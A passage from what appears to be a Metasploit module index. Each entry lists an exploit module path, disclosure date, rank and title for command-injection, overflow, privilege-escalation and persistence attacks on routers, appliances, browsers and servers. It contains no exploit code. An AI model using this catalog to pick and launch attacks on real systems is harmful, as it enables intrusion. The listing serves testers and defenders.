OS Command Injection - linux/http/dlink_dir850l_unauth_exec 2017-08-09 excellent Yes DIR-850L (Un)authenticated OS Command Exec - linux/http/dlink_dsl2750b_exec_noauth 2016-02-05 great Yes D-Link DSL-2750B OS Command Injection - linux/http/dlink_dspw110_cookie_noauth_exec 2015-06-12 normal Yes D-Link Cookie Command Execution - linux/http/dlink_dspw215_info_cgi_bof 2014-05-22 normal Yes D-Link info.cgi POST Request Buffer Overflow - linux/http/dlink_hedwig_cgi_bof 2013-02-08 normal Yes D-Link hedwig.cgi Buffer Overflow in Cookie Header - linux/http/dlink_hnap_bof 2014-05-15 normal Yes D-Link HNAP Request Remote Buffer Overflow - linux/http/dlink_hnap_header_exec_noauth 2015-02-13 normal Yes D-Link Devices HNAP SOAPAction-Header Command Execution - linux/http/dlink_hnap_login_bof 2016-11-07 excellent Yes Dlink DIR Routers Unauthenticated HNAP Login Stack Buffer Overflow - linux/http/dlink_upnp_exec_noauth 2013-07-05 normal Yes D-Link Devices UPnP SOAP Command Execution - linux/http/dnalims_admin_exec 2017-03-08 excellent Yes dnaLIMS Admin Module Command Execution - linux/http/docker_daemon_tcp 2017-07-25 excellent Yes Docker Daemon - Unprotected TCP Socket Exploit - linux/http/dolibarr_cmd_exec 2012-04-06 excellent Yes Dolibarr ERP/CRM Post-Auth OS Command Injection - linux/http/dreambox_openpli_shell 2013-02-08 great No OpenPLI Webif Arbitrary Command Execution - linux/http/efw_chpasswd_exec 2015-06-28 excellent No Endian Firewall Proxy Password Change Command Injection - linux/http/empire_skywalker 2016-10-15 excellent Yes PowerShellEmpire Arbitrary File Upload (Skywalker) - linux/http/esva_exec 2012-08-16 excellent Yes E-Mail Security Virtual Appliance learn-msg.cgi Command Injection - linux/http/f5_icall_cmd 2015-09-03 excellent Yes F5 iControl iCall::Script Root Command Execution - linux/http/f5_icontrol_exec 2013-09-17 excellent Yes F5 iControl Remote Root Command Execution - linux/http/foreman_openstack_satellite_code_exec 2013-06-06 excellent No Foreman (Red Hat OpenStack/Satellite) bookmarks/create Code Injection - linux/http/fritzbox_echo_exec 2014-02-11 excellent Yes Fritz!Box Webcm Unauthenticated Command Injection - linux/http/github_enterprise_secret 2017-03-15 excellent Yes Github Enterprise Default Session Secret And Deserialization Vulnerability - linux/http/gitlist_exec 2014-06-30 excellent Yes Gitlist Unauthenticated Remote Command Execution - linux/http/goahead_ldpreload 2017-12-18 excellent Yes GoAhead Web Server LD_PRELOAD Arbitrary Module Load - linux/http/goautodial_3_rce_command_injection 2015-04-21 excellent Yes GoAutoDial 3.3 Authentication Bypass / Command Injection - linux/http/gpsd_format_string 2005-05-25 average No Berlios GPSD Format String Vulnerability - linux/http/groundwork_monarch_cmd_exec 2013-03-08 excellent Yes GroundWork monarch_scan.cgi OS Command Injection - linux/http/hadoop_unauth_exec 2016-10-19 excellent Yes Hadoop YARN ResourceManager Unauthenticated Command Execution - linux/http/hp_system_management 2012-09-01 normal Yes HP System Management Anonymous Access Code Execution - linux/http/hp_van_sdn_cmd_inject 2018-06-25 excellent Yes HP VAN SDN Controller Root Command Injection - linux/http/huawei_hg532n_cmdinject 2017-04-15 excellent Yes Huawei HG532n Command Injection - linux/http/ibm_qradar_unauth_rce 2018-05-28 excellent Yes IBM QRadar SIEM Unauthenticated Remote Code Execution - linux/http/imperva_securesphere_exec 2018-10-08 excellent Yes Imperva SecureSphere PWS Command Injection - linux/http/ipfire_bashbug_exec 2014-09-29 excellent Yes IPFire Bash Environment Variable Injection (Shellshock) - linux/http/ipfire_oinkcode_exec 2017-06-09 excellent Yes IPFire proxy.cgi RCE - linux/http/ipfire_proxy_exec 2016-05-04 excellent Yes IPFire proxy.cgi RCE - linux/http/kaltura_unserialize_cookie_rce 2017-09-12 excellent Yes Kaltura Remote PHP Code Execution over Cookie - linux/http/kaltura_unserialize_rce 2016-03-15 excellent Yes Kaltura Remote PHP Code Execution - linux/http/kloxo_sqli 2014-01-28 manual Yes Kloxo SQL Injection and Remote Code Execution - linux/http/lifesize_uvc_ping_rce 2014-03-21 excellent No LifeSize UVC Authenticated RCE via Ping - linux/http/linksys_apply_cgi 2005-09-13 great No Linksys WRT54 Access Point apply.cgi Buffer Overflow - linux/http/linksys_e1500_apply_exec 2013-02-05 excellent No Linksys E1500/E2500 apply.cgi Remote Command Injection - linux/http/linksys_themoon_exec 2014-02-13 excellent Yes Linksys E-Series TheMoon Remote Command Injection - linux/http/linksys_wrt110_cmd_exec 2013-07-12 excellent Yes Linksys Devices pingstr Remote Command Injection - linux/http/linksys_wrt160nv2_apply_exec 2013-02-11 excellent No Linksys WRT160nv2 apply.cgi Remote Command Injection - linux/http/linksys_wrt54gl_apply_exec 2013-01-18 manual No Linksys WRT54GL apply.cgi Command Execution - linux/http/linksys_wvbr0_user_agent_exec_noauth 2017-12-13 excellent Yes Linksys WVBR0-25 User-Agent Command Execution - linux/http/logsign_exec 2017-02-26 excellent Yes Logsign Remote Command Injection - linux/http/mailcleaner_exec 2018-12-19 excellent No Mailcleaner Remote Code Execution - linux/http/microfocus_secure_messaging_gateway 2018-06-19 excellent Yes MicroFocus Secure Messaging Gateway Remote Code Execution - linux/http/multi_ncc_ping_exec 2015-02-26 normal Yes D-Link/TRENDnet NCC Service Command Injection - linux/http/mutiny_frontend_upload 2013-05-15 excellent Yes Mutiny 5 Arbitrary File Upload - linux/http/mvpower_dvr_shell_exec 2015-08-23 excellent Yes MVPower DVR Shell Unauthenticated Command Execution - linux/http/nagios_xi_chained_rce 2016-03-06 excellent Yes Nagios XI Chained Remote Code Execution - linux/http/nagios_xi_chained_rce_2_electric_boogaloo 2018-04-17 manual Yes Nagios XI Chained Remote Code Execution - linux/http/netgear_dgn1000_setup_unauth_exec 2013-06-05 excellent Yes Netgear DGN1000 Setup.cgi Unauthenticated RCE - linux/http/netgear_dgn1000b_setup_exec 2013-02-06 excellent No Netgear DGN1000B setup.cgi Remote Command Execution - linux/http/netgear_dgn2200b_pppoe_exec 2013-02-15 manual No Netgear DGN2200B pppoe.cgi Remote Command Execution - linux/http/netgear_dnslookup_cmd_exec 2017-02-25 excellent Yes Netgear DGN2200 dnslookup.cgi Command Injection - linux/http/netgear_r7000_cgibin_exec 2016-12-06 excellent Yes Netgear R7000 and R6400 cgi-bin Command Injection - linux/http/netgear_readynas_exec 2013-07-12 manual Yes NETGEAR ReadyNAS Perl Code Evaluation - linux/http/netgear_unauth_exec 2016-02-25 excellent Yes Netgear Devices Unauthenticated Remote Command Execution - linux/http/netgear_wnr2000_rce 2016-12-20 excellent Yes NETGEAR WNR2000v5 (Un)authenticated hidden_lang_avi Stack Overflow - linux/http/nginx_chunked_size 2013-05-07 great Yes Nginx HTTP Server 1.3.9-1.4.0 Chunked Encoding Stack Buffer Overflow - linux/http/nuuo_nvrmini_auth_rce 2016-08-04 excellent No NUUO NVRmini 2 / Crystal / NETGEAR ReadyNAS Surveillance Authenticated Remote Code Execution - linux/http/nuuo_nvrmini_unauth_rce 2016-08-04 excellent Yes NUUO NVRmini 2 / NETGEAR ReadyNAS Surveillance Unauthenticated Remote Code Execution - linux/http/op5_config_exec 2016-04-08 excellent Yes op5 v7.1.9 Configuration Command Execution - linux/http/openfiler_networkcard_exec 2012-09-04 excellent Yes Openfiler v2.x NetworkCard Command Execution - linux/http/pandora_fms_exec 2014-01-29 excellent Yes Pandora FMS Remote Code Execution - linux/http/pandora_fms_sqli 2014-02-01 excellent Yes Pandora FMS Default Credential / SQLi Remote Code Execution - linux/http/panos_readsessionvars 2017-12-11 excellent No Palo Alto Networks readSessionVarsFromFile() Session Corruption - linux/http/peercast_url 2006-03-08 average No PeerCast URL Handling Buffer Overflow - linux/http/php_imap_open_rce 2018-10-23 good Yes php imap_open Remote Code Execution - linux/http/pineapp_ldapsyncnow_exec 2013-07-26 excellent Yes PineApp Mail-SeCure ldapsyncnow.php Arbitrary Command Execution - linux/http/pineapp_livelog_exec 2013-07-26 excellent Yes PineApp Mail-SeCure livelog.html Arbitrary Command Execution - linux/http/pineapp_test_li_conn_exec 2013-07-26 excellent Yes PineApp Mail-SeCure test_li_connection.php Arbitrary Command Execution - linux/http/pineapple_bypass_cmdinject 2015-08-01 excellent Yes Hak5 WiFi Pineapple Preconfiguration Command Injection - linux/http/pineapple_preconfig_cmdinject 2015-08-01 excellent Yes Hak5 WiFi Pineapple Preconfiguration Command Injection - linux/http/piranha_passwd_exec 2000-04-04 excellent No RedHat Piranha Virtual Server Package passwd.php3 Arbitrary Command Execution - linux/http/qnap_qcenter_change_passwd_exec 2018-07-11 excellent Yes QNAP Q'Center change_passwd Command Execution - linux/http/raidsonic_nas_ib5220_exec_noauth 2013-02-04 manual No Raidsonic NAS Devices Unauthenticated Remote Command Execution - linux/http/railo_cfml_rfi 2014-08-26 excellent Yes Railo Remote File Include - linux/http/rancher_server 2017-07-27 excellent Yes Rancher Server - Docker Exploit - linux/http/realtek_miniigd_upnp_exec_noauth 2015-04-24 normal Yes Realtek SDK Miniigd UPnP SOAP Command Execution - linux/http/riverbed_netprofiler_netexpress_exec 2016-06-27 excellent Yes Riverbed SteelCentral NetProfiler/NetExpress Remote Code Execution - linux/http/samsung_srv_1670d_upload_exec 2017-03-14 good Yes Samsung SRN-1670D Web Viewer Version 1.0.0.193 Arbitrary File Read and Upload - linux/http/seagate_nas_php_exec_noauth 2015-03-01 normal Yes Seagate Business NAS Unauthenticated Remote Command Execution - linux/http/smt_ipmi_close_window_bof 2013-11-06 good Yes Supermicro Onboard IPMI close_window.cgi Buffer Overflow - linux/http/sophos_wpa_iface_exec 2014-04-08 excellent No Sophos Web Protection Appliance Interface Authenticated Arbitrary Command Execution - linux/http/sophos_wpa_sblistpack_exec 2013-09-06 excellent Yes Sophos Web Protection Appliance sblistpack Arbitrary Command Execution - linux/http/spark_unauth_rce 2017-12-12 excellent Yes Apache Spark Unauthenticated Command Execution - linux/http/supervisor_xmlrpc_exec 2017-07-19 excellent Yes Supervisor XML-RPC Authenticated Remote Code Execution - linux/http/symantec_messaging_gateway_exec 2017-04-26 excellent No Symantec Messaging Gateway Remote Code Execution - linux/http/symantec_web_gateway_exec 2012-05-17 excellent Yes Symantec Web Gateway 5.0.2.8 ipchange.php Command Injection - linux/http/symantec_web_gateway_file_upload 2012-05-17 excellent Yes Symantec Web Gateway 5.0.2.8 Arbitrary PHP File Upload Vulnerability - linux/http/symantec_web_gateway_lfi 2012-05-17 excellent Yes Symantec Web Gateway 5.0.2.8 relfile File Inclusion Vulnerability - linux/http/symantec_web_gateway_pbcontrol 2012-07-23 excellent Yes Symantec Web Gateway 5.0.2.18 pbcontrol.php Command Injection - linux/http/symantec_web_gateway_restore 2014-12-16 excellent Yes Symantec Web Gateway 5 restore.php Post Authentication Command Injection - linux/http/synology_dsm_sliceupload_exec_noauth 2013-10-31 excellent Yes Synology DiskStation Manager SLICEUPLOAD Remote Command Execution - linux/http/tiki_calendar_exec 2016-06-06 excellent Yes Tiki-Wiki CMS Calendar Command Execution - linux/http/tp_link_sc2020n_authenticated_telnet_injection 2015-12-20 excellent No TP-Link SC2020n Authenticated Telnet Injection - linux/http/tr064_ntpserver_cmdinject 2016-11-07 normal Yes Zyxel/Eir D1000 DSL Modem NewNTPServer Command Injection Over TR-064 - linux/http/trend_micro_imsva_exec 2017-01-15 excellent No Trend Micro InterScan Messaging Security (Virtual Appliance) Remote Code Execution - linux/http/trendmicro_imsva_widget_exec 2017-10-07 excellent Yes Trend Micro InterScan Messaging Security (Virtual Appliance) Remote Code Execution - linux/http/trendmicro_sps_exec 2016-08-08 excellent Yes Trend Micro Smart Protection Server Exec Remote Code Injection - linux/http/trueonline_billion_5200w_rce 2016-12-26 excellent No TrueOnline / Billion 5200W-T Router Unauthenticated Command Injection - linux/http/trueonline_p660hn_v1_rce 2016-12-26 excellent Yes TrueOnline / ZyXEL P660HN-T v1 Router Unauthenticated Command Injection - linux/http/trueonline_p660hn_v2_rce 2016-12-26 excellent Yes TrueOnline / ZyXEL P660HN-T v2 Router Authenticated Command Injection - linux/http/ueb_api_rce 2017-08-08 excellent Yes Unitrends UEB http api remote code execution - linux/http/vap2500_tools_command_exec 2014-11-25 normal Yes Arris VAP2500 tools_command.php Command Execution - linux/http/vcms_upload 2011-11-27 excellent Yes V-CMS PHP File Upload and Execute - linux/http/wanem_exec 2012-08-12 excellent Yes WAN Emulator v2.3 Command Execution - linux/http/wd_mycloud_multiupload_upload 2017-07-29 excellent Yes Western Digital MyCloud multi_uploadify File Upload Vulnerability - linux/http/webcalendar_settings_exec 2012-04-23 excellent Yes WebCalendar 1.2.4 Pre-Auth Remote Code Injection - linux/http/webid_converter 2011-07-05 excellent Yes WeBid converter.php Remote PHP Code Injection - linux/http/wipg1000_cmd_injection 2017-04-20 excellent Yes WePresent WiPG-1000 Command Injection - linux/http/xplico_exec 2017-10-29 excellent Yes Xplico Remote Code Execution - linux/http/zabbix_sqli 2013-09-23 excellent Yes Zabbix 2.0.8 SQL Injection and Remote Code Execution - linux/http/zen_load_balancer_exec 2012-09-14 excellent Yes ZEN Load Balancer Filelog Command Execution - linux/http/zenoss_showdaemonxmlconfig_exec 2012-07-30 good Yes Zenoss 3 showDaemonXMLConfig Command Execution - linux/ids/alienvault_centerd_soap_exec 2014-05-05 excellent Yes AlienVault OSSIM av-centerd Command Injection - linux/ids/snortbopre 2005-10-18 good No Snort Back Orifice Pre-Preprocessor Buffer Overflow - linux/imap/imap_uw_lsub 2000-04-16 good Yes UoW IMAP Server LSUB Buffer Overflow - linux/local/abrt_raceabrt_priv_esc 2015-04-14 excellent Yes ABRT raceabrt Privilege Escalation - linux/local/af_packet_chocobo_root_priv_esc 2016-08-12 good Yes AF_PACKET chocobo_root Privilege Escalation - linux/local/af_packet_packet_set_ring_priv_esc 2017-03-29 good Yes AF_PACKET packet_set_ring Privilege Escalation - linux/local/apport_abrt_chroot_priv_esc 2015-03-31 excellent Yes Apport / ABRT chroot Privilege Escalation - linux/local/asan_suid_executable_priv_esc 2016-02-17 excellent Yes AddressSanitizer (ASan) SUID Executable Privilege Escalation - linux/local/autostart_persistence 2006-02-13 excellent No Autostart Desktop Item Persistence - linux/local/blueman_set_dhcp_handler_dbus_priv_esc 2015-12-18 excellent Yes blueman set_dhcp_handler D-Bus Privilege Escalation - linux/local/bpf_priv_esc 2016-05-04 good Yes Linux BPF doubleput UAF Privilege Escalation - linux/local/bpf_sign_extension_priv_esc 2017-11-12 great Yes Linux BPF Sign Extension Local Privilege Escalation - linux/local/cron_persistence 1979-07-01 excellent No Cron Persistence - linux/local/desktop_privilege_escalation 2014-08-07 excellent Yes Desktop Linux Password Stealer and Privilege Escalation - linux/local/docker_daemon_privilege_escalation 2016-06-28 excellent Yes Docker Daemon Privilege Escalation - linux/local/glibc_ld_audit_dso_load_priv_esc 2010-10-18 excellent Yes glibc LD_AUDIT Arbitrary DSO Load Privilege Escalation - linux/local/glibc_origin_expansion_priv_esc 2010-10-18 excellent Yes glibc '$ORIGIN' Expansion Privilege Escalation - linux/local/glibc_realpath_priv_esc 2018-01-16 normal Yes glibc 'realpath()' Privilege Escalation - linux/local/hp_smhstart 2013-03-30 normal No HP System Management Homepage Local Privilege Escalation - linux/local/juju_run_agent_priv_esc 2017-04-13 excellent Yes Juju-run Agent Privilege Escalation - linux/local/kloxo_lxsuexec 2012-09-18 excellent No Kloxo Local Privilege Escalation - linux/local/lastore_daemon_dbus_priv_esc 2016-02-02 excellent Yes lastore-daemon D-Bus Privilege Escalation - linux/local/libuser_roothelper_priv_esc 2015-07-24 great Yes Libuser roothelper Privilege Escalation - linux/local/nested_namespace_idmap_limit_priv_esc 2018-11-15 great Yes Linux Nested User Namespace idmap Limit Local Privilege Escalation - linux/local/netfilter_priv_esc_ipv4 2016-06-03 good Yes Linux Kernel 4.6.3 Netfilter Privilege Escalation - linux/local/network_manager_vpnc_username_priv_esc 2018-07-26 excellent Yes Network Manager VPNC Username Privilege Escalation - linux/local/ntfs3g_priv_esc 2017-01-05 good Yes Debian/Ubuntu ntfs-3g Local Privilege Escalation - linux/local/overlayfs_priv_esc 2015-06-16 good Yes Overlayfs Privilege Escalation - linux/local/pkexec 2011-04-01 great Yes Linux PolicyKit Race Condition Privilege Escalation - linux/local/rc_local_persistence 1980-10-01 excellent No rc.local Persistence - linux/local/rds_priv_esc 2010-10-20 great Yes Reliable Datagram Sockets (RDS) Privilege Escalation - linux/local/recvmmsg_priv_esc 2014-02-02 good Yes Linux Kernel recvmmsg Privilege Escalation - linux/local/service_persistence 1983-01-01 excellent No Service Persistence - linux/local/sock_sendpage 2009-08-13 great Yes Linux Kernel Sendpage Local Privilege Escalation - linux/local/sophos_wpa_clear_keys 2013-09-06 excellent Yes Sophos Web Protection Appliance clear_keys.pl Local Privilege Escalation - linux/local/udev_netlink 2009-04-16 great No Linux udev Netlink Local Privilege Escalation - linux/local/ueb_bpserverd_privesc 2018-03-14 excellent No Unitrends Enterprise Backup bpserverd Privilege Escalation - linux/local/ufo_privilege_escalation 2017-08-10 good Yes Linux Kernel UDP Fragmentation Offset (UFO) Privilege Escalation - linux/local/vmware_alsa_config 2017-05-22 excellent Yes VMware Workstation ALSA Config File Local Privilege Escalation - linux/local/vmware_mount 2013-08-22 excellent Yes VMWare Setuid vmware-mount Unsafe popen(3) - linux/local/zpanel_zsudo 2013-06-07 excellent Yes ZPanel zsudo Local Privilege Escalation Exploit - linux/misc/accellion_fta_mpipe2 2011-02-07 excellent No Accellion FTA MPIPE2 Command Execution - linux/misc/asus_infosvr_auth_bypass_exec 2015-01-04 excellent No ASUS infosvr Auth Bypass Command Execution - linux/misc/drb_remote_codeexec 2011-03-23 excellent No Distributed Ruby Remote Code Execution - linux/misc/gld_postfix 2005-04-12 good No GLD (Greylisting Daemon) Postfix Buffer Overflow - linux/misc/hid_discoveryd_command_blink_on_unauth_rce 2016-03-28 excellent Yes HID discoveryd command_blink_on Unauthenticated RCE - linux/misc/hikvision_rtsp_bof 2014-11-19 normal No Hikvision DVR RTSP Request Remote Code Execution - linux/misc/hp_data_protector_cmd_exec 2011-02-07 excellent No HP Data Protector 6 EXEC_CMD Remote Code Execution - linux/misc/hp_jetdirect_path_traversal 2017-04-05 normal No HP Jetdirect Path Traversal Arbitrary Code Execution - linux/misc/hp_nnmi_pmd_bof 2014-09-09 normal Yes HP Network Node Manager I PMD Buffer Overflow - linux/misc/hp_vsa_login_bof 2013-06-28 normal Yes HP StorageWorks P4000 Virtual SAN Appliance Login Buffer Overflow - linux/misc/hplip_hpssd_exec 2007-10-04 excellent No HPLIP hpssd.py From Address Arbitrary Command Execution - linux/misc/ib_inet_connect 2007-10-03 good No Borland InterBase INET_connect() Buffer Overflow - linux/misc/ib_jrd8_create_database 2007-10-03 good No Borland InterBase jrd8_create_database() Buffer Overflow - linux/misc/ib_open_marker_file 2007-10-03 good No Borland InterBase open_marker_file() Buffer Overflow - linux/misc/ib_pwd_db_aliased 2007-10-03 good No Borland InterBase PWD_db_aliased() Buffer Overflow - linux/misc/jenkins_java_deserialize 2015-11-18 excellent Yes Jenkins CLI RMI Java Deserialization Vulnerability - linux/misc/jenkins_ldap_deserialize 2016-11-16 excellent Yes Jenkins CLI HTTP Java Deserialization Vulnerability - linux/misc/lprng_format_string 2000-09-25 normal No LPRng use_syslog Remote Format String Vulnerability - linux/misc/mongod_native_helper 2013-03-24 normal No MongoDB nativeHelper.apply Remote Code Execution - linux/misc/nagios_nrpe_arguments 2013-02-21 excellent Yes Nagios Remote Plugin Executor Arbitrary Command Execution - linux/misc/netcore_udp_53413_backdoor 2014-08-25 normal Yes Netcore Router Udp 53413 Backdoor - linux/misc/netsupport_manager_agent 2011-01-08 average No NetSupport Manager Agent Remote Buffer Overflow - linux/misc/novell_edirectory_ncp_bof 2012-12-12 normal Yes Novell eDirectory 8 Buffer Overflow - linux/misc/opennms_java_serialize 2015-11-06 normal No OpenNMS Java Object Unserialization Remote Code Execution - linux/misc/qnap_transcode_server 2017-08-06 excellent Yes QNAP Transcode Server Command Execution - linux/misc/quest_pmmasterd_bof 2017-04-09 normal Yes Quest Privilege Manager pmmasterd Buffer Overflow - linux/misc/sercomm_exec 2013-12-31 great Yes SerComm Device Remote Code Execution - linux/misc/ueb9_bpserverd 2017-08-08 excellent Yes Unitrends UEB bpserverd authentication bypass RCE - linux/misc/zabbix_server_exec 2009-09-10 excellent Yes Zabbix Server Arbitrary Command Execution - linux/mysql/mysql_yassl_getname 2010-01-25 good No MySQL yaSSL CertDecoder::GetName Buffer Overflow - linux/mysql/mysql_yassl_hello 2008-01-04 good No MySQL yaSSL SSL Hello Message Buffer Overflow - linux/pop3/cyrus_pop3d_popsubfolders 2006-05-21 normal No Cyrus IMAPD pop3d popsubfolders USER Buffer Overflow - linux/postgres/postgres_payload 2007-06-05 excellent Yes PostgreSQL for Linux Payload Execution - linux/pptp/poptop_negative_read 2003-04-09 great Yes Poptop Negative Read Overflow - linux/proxy/squid_ntlm_authenticate 2004-06-08 great No Squid NTLM Authenticate Overflow - linux/samba/chain_reply 2010-06-16 good No Samba chain_reply Memory Corruption (Linux x86) - linux/samba/is_known_pipename 2017-03-24 excellent Yes Samba is_known_pipename() Arbitrary Module Load - linux/samba/lsa_transnames_heap 2007-05-14 good Yes Samba lsa_io_trans_names Heap Overflow - linux/samba/setinfopolicy_heap 2012-04-10 normal Yes Samba SetInformationPolicy AuditEventsInfo Heap Overflow - linux/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (Linux x86) - linux/smtp/exim4_dovecot_exec 2013-05-03 excellent No Exim and Dovecot Insecure Configuration Command Injection - linux/smtp/exim_gethostbyname_bof 2015-01-27 great Yes Exim GHOST (glibc gethostbyname) Buffer Overflow - linux/smtp/haraka 2017-01-26 excellent Yes Haraka SMTP Command Injection - linux/ssh/ceragon_fibeair_known_privkey 2015-04-01 excellent No Ceragon FibeAir IP-10 SSH Private Key Exposure - linux/ssh/exagrid_known_privkey 2016-04-07 excellent No ExaGrid Known SSH Key and Default Password - linux/ssh/f5_bigip_known_privkey 2012-06-11 excellent No F5 BIG-IP SSH Private Key Exposure - linux/ssh/loadbalancerorg_enterprise_known_privkey 2014-03-17 excellent No Loadbalancer.org Enterprise VA SSH Private Key Exposure - linux/ssh/mercurial_ssh_exec 2017-04-18 excellent No Mercurial Custom hg-ssh Wrapper Remote Code Exec - linux/ssh/quantum_dxi_known_privkey 2014-03-17 excellent No Quantum DXi V1000 SSH Private Key Exposure - linux/ssh/quantum_vmpro_backdoor 2014-03-17 excellent No Quantum vmPRO Backdoor Command - linux/ssh/solarwinds_lem_exec 2017-03-17 excellent No SolarWind LEM Default SSH Password Remote Code Execution - linux/ssh/symantec_smg_ssh 2012-08-27 excellent No Symantec Messaging Gateway 9.5 Default SSH Password Vulnerability - linux/ssh/ubiquiti_airos_file_upload 2016-02-13 excellent No Ubiquiti airOS Arbitrary File Upload - linux/ssh/vmware_vdp_known_privkey 2016-12-20 excellent No VMware VDP Known SSH Key - linux/telnet/netgear_telnetenable 2009-10-30 excellent Yes NETGEAR TelnetEnable - linux/telnet/telnet_encrypt_keyid 2011-12-23 great No Linux BSD-derived Telnet Service Encryption Key ID Buffer Overflow - linux/upnp/belkin_wemo_upnp_exec 2014-04-04 excellent Yes Belkin Wemo UPnP Remote Code Execution - linux/upnp/dlink_upnp_msearch_exec 2013-02-01 excellent Yes D-Link Unauthenticated UPnP M-SEARCH Multicast Command Injection - linux/upnp/miniupnpd_soap_bof 2013-03-27 normal Yes MiniUPnPd 1.0 Stack Buffer Overflow Remote Code Execution - mainframe/ftp/ftp_jcl_creds 2013-05-12 normal Yes FTP JCL Execution - multi/browser/adobe_flash_hacking_team_uaf 2015-07-06 great No Adobe Flash Player ByteArray Use After Free - multi/browser/adobe_flash_nellymoser_bof 2015-06-23 great No Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow - multi/browser/adobe_flash_net_connection_confusion 2015-03-12 great No Adobe Flash Player NetConnection Type Confusion - multi/browser/adobe_flash_opaque_background_uaf 2015-07-06 great No Adobe Flash opaqueBackground Use After Free - multi/browser/adobe_flash_pixel_bender_bof 2014-04-28 great No Adobe Flash Player Shader Buffer Overflow - multi/browser/adobe_flash_shader_drawing_fill 2015-05-12 great No Adobe Flash Player Drawing Fill Shader Memory Corruption - multi/browser/adobe_flash_shader_job_overflow 2015-05-12 great No Adobe Flash Player ShaderJob Buffer Overflow - multi/browser/adobe_flash_uncompress_zlib_uaf 2014-04-28 great No Adobe Flash Player ByteArray UncompressViaZlibVariant Use After Free - multi/browser/firefox_escape_retval 2009-07-13 normal No Firefox 3.5 escape() Return Value Memory Corruption - multi/browser/firefox_pdfjs_privilege_escalation 2015-03-31 manual No Firefox PDF.js Privileged Javascript Injection - multi/browser/firefox_proto_crmfrequest 2013-08-06 excellent No Firefox 5.0 - 15.0.1 __exposedProps__ XCS Code Execution - multi/browser/firefox_proxy_prototype 2014-01-20 manual No Firefox Proxy Prototype Privileged Javascript Injection - multi/browser/firefox_queryinterface 2006-02-02 normal No Firefox location.QueryInterface() Code Execution - multi/browser/firefox_svg_plugin 2013-01-08 excellent No Firefox 17.0.1 Flash Privileged Code Injection - multi/browser/firefox_tostring_console_injection 2013-05-14 excellent No Firefox toString console.time Privileged Javascript Injection - multi/browser/firefox_webidl_injection 2014-03-17 excellent No Firefox WebIDL Privileged Javascript Injection - multi/browser/firefox_xpi_bootstrapped_addon 2007-06-27 excellent No Mozilla Firefox Bootstrapped Addon Social Engineering Code Execution - multi/browser/itms_overflow 2009-06-01 great No Apple OS X iTunes 8.1.1 ITMS Overflow - multi/browser/java_atomicreferencearray 2012-02-14 excellent No Java AtomicReferenceArray Type Violation Vulnerability - multi/browser/java_calendar_deserialize 2008-12-03 excellent No Sun Java Calendar Deserialization Privilege Escalation - multi/browser/java_getsoundbank_bof 2009-11-04 great No Sun Java JRE getSoundbank file:// URI Buffer Overflow - multi/browser/java_jre17_driver_manager 2013-01-10 excellent No Java Applet Driver Manager Privileged toString() Remote Code Execution - multi/browser/java_jre17_exec 2012-08-26 excellent No Java 7 Applet Remote Code Execution - multi/browser/java_jre17_glassfish_averagerangestatisticimpl 2012-10-16 excellent No Java Applet AverageRangeStatisticImpl Remote Code Execution - multi/browser/java_jre17_jaxws 2012-10-16 excellent No Java Applet JAX-WS Remote Code Execution - multi/browser/java_jre17_jmxbean 2013-01-10 excellent No Java Applet JMX Remote Code Execution - multi/browser/java_jre17_jmxbean_2 2013-01-19 excellent No Java Applet JMX Remote Code Execution - multi/browser/java_jre17_method_handle 2012-10-16 excellent No Java Applet Method Handle Remote Code Execution - multi/browser/java_jre17_provider_skeleton 2013-06-18 great No Java Applet ProviderSkeleton Insecure Invoke Method - multi/browser/java_jre17_reflection_types 2013-01-10 excellent No Java Applet Reflection Type Confusion Remote Code Execution - multi/browser/java_rhino 2011-10-18 excellent No Java Applet Rhino Script Engine Remote Code Execution - multi/browser/java_rmi_connection_impl 2010-03-31 excellent No Java RMIConnectionImpl Deserialization Privilege Escalation - multi/browser/java_setdifficm_bof 2009-11-04 great No Sun Java JRE AWT setDiffICM Buffer Overflow - multi/browser/java_signed_applet 1997-02-19 excellent No Java Signed Applet Social Engineering Code Execution - multi/browser/java_storeimagearray 2013-08-12 great No Java storeImageArray() Invalid Array Indexing Vulnerability - multi/browser/java_trusted_chain 2010-03-31 excellent No Java Statement.invoke() Trusted Method Chain Privilege Escalation - multi/browser/java_verifier_field_access 2012-06-06 excellent No Java Applet Field Bytecode Verifier Cache Remote Code Execution - multi/browser/mozilla_compareto 2005-07-13 normal No Mozilla Suite/Firefox compareTo() Code Execution - multi/browser/mozilla_navigatorjava 2006-07-25 normal No Mozilla Suite/Firefox Navigator Object Code Execution - multi/browser/msfd_rce_browser 2018-04-11 normal No Metasploit msfd Remote Code Execution via Browser - multi/browser/opera_configoverwrite 2007-03-05 excellent No Opera 9 Configuration Overwrite - multi/browser/opera_historysearch 2008-10-23 excellent No Opera historysearch XSS - multi/browser/qtjava_pointer 2007-04-23 excellent No Apple QTJava toQTPointer() Arbitrary Memory Access - multi/elasticsearch/script_mvel_rce 2013-12-09 excellent Yes ElasticSearch Dynamic Script Arbitrary Java Execution - multi/elasticsearch/search_groovy_script 2015-02-11 excellent Yes ElasticSearch Search Groovy Sandbox Bypass - multi/fileformat/adobe_u3d_meshcont 2009-10-13 good No Adobe U3D CLODProgressiveMeshDeclaration Array Overrun - multi/fileformat/evince_cbt_cmd_injection 2017-07-13 excellent No Evince CBT File Command Injection - multi/fileformat/ghostscript_failed_restore 2018-08-21 excellent No Ghostscript Failed Restore Command Execution - multi/fileformat/js_unpacker_eval_injection 2015-02-18 excellent No Javascript Injection for Eval-based Unpackers - multi/fileformat/maple_maplet 2010-04-26 excellent No Maple Maplet File Creation and Command Execution - multi/fileformat/nodejs_js_yaml_load_code_exec 2013-06-28 excellent No Nodejs js-yaml load() Code Execution - multi/fileformat/office_word_macro 2012-01-10 excellent No Microsoft Office Word Malicious Macro Execution - multi/fileformat/peazip_command_injection 2009-06-05 excellent No PeaZip Zip Processing Command Injection - multi/fileformat/swagger_param_inject 2016-06-23 excellent No JSON Swagger CodeGen Parameter Injector - multi/ftp/pureftpd_bash_env_exec 2014-09-24 excellent Yes Pure-FTPd External Authentication Bash Environment Variable Code Injection (Shellshock) - multi/ftp/wuftpd_site_exec_format 2000-06-22 great Yes WU-FTPD SITE EXEC/INDEX Format String Vulnerability - multi/gdb/gdb_server_exec 2014-08-24 great No GDB Server Remote Payload Execution - multi/hams/steamed 2018-04-01 manual No Steamed Hams - multi/handler manual No Generic Payload Handler - multi/http/activecollab_chat 2012-05-30 excellent Yes Active Collab "chat module" Remote PHP Code Injection Exploit - 